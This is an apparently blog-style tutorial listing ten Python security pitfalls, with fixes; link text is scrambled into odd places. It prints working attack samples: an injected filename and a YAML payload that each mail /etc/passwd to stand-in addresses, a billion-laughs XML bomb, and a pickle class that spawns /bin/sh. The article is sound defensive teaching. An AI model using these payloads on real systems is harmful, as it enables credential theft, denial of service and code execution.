Writing secure code is hard. When you learn a language, a module or a framework, you learn how it . When thinking about security, you need to think about . Python is no exception, even within the standard library there are documented bad practices for writing hardened applications. Yet, when I’ve spoken to many Python developers they simply aren’t aware of them. supposed to be used how it can be misused Here are my top 10, , common gotchas in Python applications. in no particular order 1. Input injection Injection attacks are broad and really common and there are many types of injection. They impact all languages, frameworks and environments. is where you’re writing SQL queries directly instead of using an ORM and mixing your string literals with variables. I’ve read plenty of code where “escaping quotes” is deemed a fix. Familiarise yourself with all the complex ways SQL injection can happen with . SQL injection It isn’t. this cheatsheet is anytime you’re calling a process using popen, subprocess, os.system and taking arguments from variables. When calling local commands there’s a possibility of someone setting those values to something malicious. Command injection Imagine this simple script . You call a subprocess with the filename as provided by the user: [credit] import subprocessdef transcode_file(request, filename): command = 'ffmpeg -i "{source}" output_file.mpg'.format(source=filename) subprocess.call(command, shell=True) # a bad idea! The attacker sets the value of filename to or something equally dangerous. "; cat /etc/passwd | mail them@domain.com Fix: Sanitise input using the utilities that come with your web framework, if you’re using one. Unless you have a good reason, don’t construct SQL queries by hand. Most ORMs have builtin sanitization methods. For the shell, use the module to correctly. shlex escape input 2. Parsing XML If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules. There are a few common attacks through XML. Mostly DoS-style (designed to crash systems instead of exfiltration of data). Those attacks are common, especially if you’re parsing (ie non-trusted) XML files. external One of those is called “billion laughs”, because of the payload normally containing a lot (billions) of “lols”. Basically, the idea is that you can do referential entities in XML, so when your unassuming XML parser tries to load this XML file into memory it consumes Try it out if you don’t believe me :-) gigabytes of RAM. <?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]><lolz>&lol9;</lolz> Another attack uses . XML supports referencing entities from external URLs, the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.” external entity expansion Another situation to consider is 3rd party packages you’re depending on that decode XML, like configuration files, remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks. So what happens in Python? Well, the standard library modules, etree, DOM, xmlrpc are all wide open to these types of attacks. It’s well documented https://docs.python.org/3/library/xml.html#xml-vulnerabilities Fix: Use as a drop-in replacement for the standard library modules. It adds safe-guards against these types of attacks. defusedxml 3. Assert statements Don’t use assert statements to guard against pieces of code that a user shouldn’t access. Take this simple example def foo(request, user):assert user.is_admin, “user does not have access” secure code... Now, by default Python executes with as true, but in a production environment it’s common to run with optimizations. This will statement and go straight to the secure code regardless of whether the user or not. __debug__ skip the assert is_admin Fix: Only use assert statements to communicate with other developers, such as in unit tests or in to guard against incorrect API usage. 4. Timing attacks Timing attacks are essentially a way of exposing the behaviour and algorithm by timing how long it takes to compare provided values. Timing attacks require precision, so they don’t typically work over a high-latency remote network. Because of the variable latency involved in most web-applications, it’s pretty much impossible to write a timing attack over HTTP web servers. But, if you have a command-line application that prompts for the password, an attacker can write a simple script to time how long it takes to compare their value with the actual secret. . Example There are some impressive examples such as written in Python if you want to see how they work. this SSH-based timing attack Fix: Use , to compare passwords and other private values. secrets.compare_digest introduced in Python 3.5 5. A polluted site-packages or import path Python’s import system is very flexible. Which is great when you’re trying to write monkey-patches for your tests, or overload core functionality. But, it’s one of the biggest security holes in Python. Installing 3rd party packages into your site-packages, whether in a virtual environment or the global site-packages (which is generally discouraged) exposes you to security holes in those packages. There have been occurrences of packages being published to PyPi with similar names to popular packages, but instead . The biggest incidence, luckily wasn’t harmful and just “made a point” that the problem is not really being addressed.. executing arbitrary code Another situation to think about is the dependencies of your dependencies (and so forth). They could include vulnerabilities and they could also override default behaviour in Python via the import system. Fix: Vet your packages. . Use virtual environments for all applications and ensure your global site-packages is as clean as possible. Check package signatures. Look at PyUp.io and their security service 6. Temporary files To create temporary files in Python, you’d typically generate a file name using function and then create a file using this name. “This is not secure, because a different process with this name in the time between the call to and the subsequent attempt to create the file by the first process.” This means it could trick your application into either loading the wrong data or exposing other temporary data. [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") may create a file [mktemp()](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp "tempfile.mktemp") [1] Recent versions of Python will raise a runtime warning if you call the incorrect method. Fix: Use the if you need to generate temporary files. tempfile module and use mkstemp 7. Using yaml.load To quote the PyYAML documentation: “Warning: It is not safe to call **yaml.load** with any data received from an untrusted source! **yaml.load** is as powerful as **pickle.load** and so may call any Python function.” This beautiful in the popular Python project Ansible. You could provide Ansible Vault with this value as the (valid) YAML. It calls with the arguments provided in the file. example found os.system() !!python/object/apply:os.system ["cat /etc/passwd | mail me@hack.c"] So, effectively loading YAML files from user-provided values leaves you wide-open to attack. Demo of this in action, credit Anthony Sottile Fix: Use , pretty much always unless you have a really good reason. yaml.safe_load 8. Pickles Deserializing pickle data is just as bad as YAML. Python classes can declare a magic-method called which returns a string, or a tuple with a callable and the arguments to call when pickling. The attacker can use that to include references to one of the subprocess modules to run arbitrary commands on the host. __reduce__ This shows how to pickle a class that opens a shell in Python 2. There are plenty more pickle. wonderful example examples of how to exploit import cPickleimport subprocessimport base64 class RunBinSh(object):def __reduce__(self):return (subprocess.Popen, (('/bin/sh',),)) print base64.b64encode(cPickle.dumps(RunBinSh())) Fix: Never unpickle data from an untrusted or unauthenticated source. Use another serialization pattern instead, like JSON. 9. Using the system Python runtime and not patching it Most POSIX systems come with a version of Python 2. Typically an old one. Since “Python”, ie CPython is written in C, there are times when the Python interpreter itself has holes. Common security issues in C are related to the allocation of memory, so buffer overflow errors. CPython has had a number of overrun or overflow vulnerabilities over the years, each of which have been patched and fixed in subsequent releases. So you’re safe. That is, if you . patch your runtime , an integer overflow vulnerability that enables code execution. any un-patched version of Ubuntu pre-17. Here’s an example from 2.7.13 and below That’s pretty much Fix: Install the latest version of Python for your production applications, and patch it! 10. Not patching your dependencies Similar to not patching your runtime, you also need to patch your dependencies regularly. I find the practice of “pinning” versions of Python packages from PyPi in packages terrifying. The idea is that “ ” so everyone leaves it alone. these are the versions that work All of the vulnerabilities in code I’ve mentioned above are just as important when they exist in packages that your application uses. Developers of those packages fix security issues. . All the time Fix: Use a service like PyUp.io to check for updates, raise pull/merge requests to your application and run your tests to keep the packages up to date. Use a tool like InSpec to environments and ensure minimal versions or version ranges are patched. validate the installed versions on production Have you tried Bandit? There’s a great static linter that will catch all of these issues in your code, and more! It’s called bandit, just and pip install bandit bandit ./codedir _bandit - Bandit is a tool designed to find common security issues in Python code._github.com PyCQA/bandit Credit to RedHat for this that I used in some of my research. great article
Share Your Thoughts